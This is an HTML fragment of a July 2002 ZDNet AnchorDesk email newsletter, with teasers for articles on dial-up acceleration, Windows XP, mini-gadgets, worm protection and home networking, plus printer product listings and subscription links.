                         &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td valign="top" width=252&gt;
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                                 &lt;font face="Arial, Helvetica" size="-2"&gt;WED JUL 17, 2002&lt;/font&gt;&lt;br&gt;                                                     
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="4"&gt;&lt;br&gt;
                         &lt;font face="Arial, Helvetica" size="-1"&gt;
                            &lt;table cellpadding=0 cellspacing=0 border=0 width=83 align=left&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/144.gif" alt="David Coursey" width="75" height="105" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;                                       
                 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#fff49f"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;David Coursey&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_yellow.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
                 &lt;tr&gt;&lt;td bgcolor="#fff49f"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=5 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;font size="3"&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQ0mQGzsIC1b2OB8OEPR" &gt;&lt;b&gt;Triple your dial-up Web surfing speeds! Here's how&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="4"&gt;&lt;br&gt;
                 Would you pay $5 or $7 a month to make your dial-up Web browsing two to five times faster? A company called Propel is betting you will. After testing the company's new service, I think it could actually fly. Let me explain.&lt;p&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wYRFZ_RaT-Dc13yE_rR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8zzza01D7c7YuNDxuyCiR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The best gear for your home network&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
          &lt;/td&gt;
                         &lt;td width=8&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=1 bgcolor="#FFF7AD"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=8 bgcolor="#FFFFFF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=143 bgcolor="#FFFFFF"&gt;
                                 &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="1" height="10" border="0"&gt;&lt;br&gt;
   &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/header2_moreon.gif" width="150" height="20" border="0" vspace=5 alt="More on AnchorDesk"&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-1"&gt;
         &lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2tGFOCEjnbcumX6cvbPR" &gt;New Windows XP on the way... Hackers get life... Bluetooth blues &lt;/a&gt;&lt;p&gt;
         &lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iIMEUqetvDA4oSMpoLnR" &gt;When is tiny too teensy? Your ideas on mini-gadgets &lt;/a&gt;&lt;p&gt;
         &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjk58ZJDvFsUb9HGRJ1bfeR" &gt;How to protect yourself against worms of the future&lt;/a&gt;&lt;p&gt;
         &lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6Cx7iRqWgeUef92iqrwyR" &gt;MS home networking: What's in it for you&lt;/a&gt;&lt;p&gt;
                  &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=4 width=1&gt;&lt;br&gt;
                         &lt;/td&gt;
                         &lt;td width=8 bgcolor="#FFFFFF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;/table&gt;&lt;br&gt;
         &lt;!-- ### --&gt;
 &lt;table width="100%"  cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff"&gt;
 &lt;tr bgcolor="#999999"&gt;&lt;td colspan="7" height="15"&gt;&lt;font face="ms sans serif, geneva" 
 color="#ffffff" size="-2"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 
 width=3&gt;&lt;b&gt;Crucial Clicks: More from ZDnet&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#999999" rowspan="3"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;
 &lt;td rowspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 height=1 width=5&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 height=5 width=1&gt;&lt;/td&gt;
 &lt;td rowspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 height=1 width=5&gt;&lt;/td&gt;
 &lt;td bgcolor="#999999" rowspan="3"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign="top"&gt;
 &lt;td width="100%"&gt;
         &lt;table width="100%"  cellpadding="0" cellspacing="0" border="0"&gt;
         &lt;tr&gt;&lt;td colspan="3"&gt;&lt;font face="verdana, geneva" color="#333333" 
 size="-2"&gt;&lt;b&gt;Printers&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br 
 /&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr valign="top"&gt;
         &lt;td width="85"&gt;&lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl1/http://www.zdnet.com/products/stories/re
 views/0,4161,2872974,00.html"&gt;&lt;img 
 src="http://www.zdnet.com/products/graphics/050202inkjets.jpg" width="85" height="110" 
 border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl2/http://www.zdnet.com/products/stories/re
 views/0,4161,2872974,00.html" style="text-decoration:none"&gt;&lt;b&gt;Personal lasers for work 
 or home&lt;/b&gt;&lt;/a&gt; &lt;br /&gt; Laser printers come in all shapes, sizes, and prices. Which one 
 is right for you? ZDNet reviewers recommend models for students, SOHOs, and 
 more. &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br 
 /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" 
 height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl3/http://www.zdnet.com/products/stories/re
 views/0,4161,2872974,00.html" style="text-decoration:none"&gt;Read 
 reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 
 width=5&gt;&lt;/td&gt;
 &lt;td width="180"&gt;
         &lt;table cellpadding="0" cellspacing="0" width="180" border="0" 
 bgcolor="#eeeeee"&gt;
         &lt;tr bgcolor="#999999"&gt;&lt;td colspan="3" height="15"&gt;&lt;font face="ms sans serif, 
 geneva" color="#ffffff" size="-2"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=3&gt;Most 
 Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;
         &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 width="10" height="1" alt="" border="0" /&gt;&lt;/td&gt;
         &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="5" 
 alt="" border="0" /&gt;&lt;br /&gt;
         &lt;b&gt;Printers&lt;/b&gt;&lt;br /&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" 
 alt="" border="0" /&gt;&lt;br /&gt;
         &lt;b&gt;1&lt;/b&gt;. &lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl4/http://zdnetshopper.cnet.com/shopping/re
 sellers/0-11868-1411-8885682-0.html" style="text-decoration:none"&gt;Canon S900&lt;/a&gt;&lt;br 
 /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" 
 height="3" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;b&gt;2&lt;/b&gt;. &lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl5/http://zdnetshopper.cnet.com/shopping/re
 sellers/0-11869-1411-6164607-0.html" style="text-decoration:none"&gt;Samsung 
 ML-1210&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt; 
         &lt;b&gt;3&lt;/b&gt;. &lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl6/http://zdnetshopper.cnet.com/shopping/re
 sellers/0-11868-1411-9782487-0.html" style="text-decoration:none"&gt;Epson Stylus Photo 
 2200&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;b&gt;4&lt;/b&gt;. &lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl7/http://zdnetshopper.cnet.com/shopping/re
 sellers/0-11868-1411-9431276-0.html" style="text-decoration:none"&gt;Canon S750&lt;/a&gt;&lt;br 
 /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" 
 height="3" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;b&gt;5&lt;/b&gt;. &lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl8/http://zdnetshopper.cnet.com/shopping/re
 sellers/0-11878-1411-9415634-0.html" style="text-decoration:none"&gt; HP OfficeJet 
 d145&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" 
 height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a 
 href="http://chkpt.zdnet.com/chkpt/zdnprmfnl9/http://zdnetshopper.cnet.com/shopping/0-
 8399-1410-0-0.html"&gt;More popular printers&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" 
 height="10" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" 
 width="10" height="1" alt="" border="0" /&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign="top"&gt;&lt;td colspan="3"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=5 
 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="7" bgcolor="#999999"&gt;&lt;img 
 src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 
 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /### --&gt; &lt;table cellpadding=10 border=0 cellspacing=0&gt;
 &lt;tr&gt;&lt;td&gt; 
                                     &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr85Eo4v7JR1rqAFZcCnR" &gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/header2_news.gif" width="150" height="20" border="0" vspace=10 alt="News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#E4F2FF"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;SYLVIA CARR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_blue.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr&gt;&lt;td bgcolor="#E4F2FF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/442.gif" alt="SYLVIA CARR" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="5"&gt;&lt;br&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vTsSjz8g-rrsLKFK0uR" &gt;&lt;b&gt;New Windows XP on the way... Hackers get life... Bluetooth blues&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Microsoft reveals details about a new version of Windows XP with all sorts of new digital-media features. Plus: The House gets tough on cybercrime. And demand for Bluetooth softens along with the weak mobile market. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
                                     &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZwKMfRNGWF8w6YrPhsR" &gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/header2_your.gif" width="150" height="20" border="0" vspace=10 alt="News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#E4F2FF"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_blue.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr&gt;&lt;td bgcolor="#E4F2FF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/445.gif" alt="DAVID MORGENSTERN" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="5"&gt;&lt;br&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6pafXC4OP5463LvvI2rgYyR" &gt;&lt;b&gt;When is tiny too teensy? Your ideas on mini-gadgets&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Some of you think mini-notebooks are too small to be truly useful. But others say they're ideal for those who need to carry around their computer all day--and were never meant for everyone, anyway. David digests your comments. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXxoBxSh8FdMkmoOwzlR" &gt;&lt;b&gt;QuickPoll results: Would you want a super-tiny Sony Vaio U1?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;p&gt;
         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/header2_expert.gif" width="150" height="20" border="0" vspace=10 alt="Expert Advice"&gt;&lt;br&gt;
                                     &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#E4F2FF"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;ROBERT VAMOSI&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_blue.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr&gt;&lt;td bgcolor="#E4F2FF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/231.gif" alt="ROBERT VAMOSI" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOokWDJu3ufz1Jey2fP4R" &gt;&lt;b&gt;How to protect yourself against worms of the future&lt;/b&gt;&lt;/a&gt;&lt;br clear="all"&gt;&lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="4"&gt;&lt;br clear="all"&gt;
                 It's been a year since the Code Red worm wreaked havoc on the Net. What's changed? Worms and viruses have gotten sneakier. But your antivirus software hasn't. Worried? Robert tells you how to prepare for future threats.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
                                     &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#E4F2FF"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;JOHN MORRIS AND JOSH TAYLOR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_blue.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr&gt;&lt;td bgcolor="#E4F2FF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/143.gif" alt="JOHN MORRIS AND JOSH TAYLOR" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWG2O6v83I81u0PT_Qv1yR" &gt;&lt;b&gt;MS home networking: What's in it for you&lt;/b&gt;&lt;/a&gt;&lt;br clear="all"&gt;&lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="4"&gt;&lt;br clear="all"&gt;
                 Microsoft is jumping into the wireless arena with a line of home-networking equipment. What does this mean to you? Networking gear that's easier to use and more secure than what's out there today, say Josh and John.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
                                     &lt;table cellpadding=0 cellspacing=0 border=0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor="#E4F2FF"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;&amp;nbsp;PRESTON GRALLA&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_blue.gif" width="23" height="15" border="0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr&gt;&lt;td bgcolor="#E4F2FF"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=408&gt;
                 &lt;tr valign=top&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/116.gif" alt="PRESTON GRALLA" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                 &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWP_c1xbbSM_svdGheo-lR" &gt;&lt;b&gt;Get a great HTML editor--for free&lt;/b&gt;&lt;/a&gt;&lt;br clear="all"&gt;&lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="4"&gt;&lt;br clear="all"&gt;
                 Whether you're a weekend Web warrior or a full-time site builder, you need a capable HTML editor. But you don't have to spend a lot of money to get one. Preston has three free tools that help you build Web pages in a jiffy.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;   
 &lt;p&gt;
 &lt;hr size=1 width="80% noshade align="left"&gt;
 &lt;font face="Arial, Helvetica" size="-1"&gt;
 &lt;div align=center&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHpiPSBk4r8dJx98lbK4R" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM8KwP1n5XiAv2Y9ZZvQKrR" &gt;&lt;b&gt;Previous Issue&lt;/b&gt;&lt;/a&gt;
 &lt;/div&gt;
 &lt;p&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=1 height=10&gt;&lt;br&gt;
 &lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;br&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /main --&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612&gt;
 &lt;tr valign=top&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;br&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=588 bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;br&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### subscription management ### --&gt;
 &lt;table width="612" bgcolor="#ffffef" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="564"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;font size="3"&gt;&lt;b&gt;Sign up for more &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/font&gt;
       &lt;p&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt; 
         &lt;a NOTRACK href='http://clickthru.online.com/Click?q=38-bL1mzdM6ESXNckCJuSP4Z-nwcb_HPdRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDjxsjKTadaB0S22bbKAZR" &gt;FAQ&lt;/a&gt;&amp;nbsp;| 
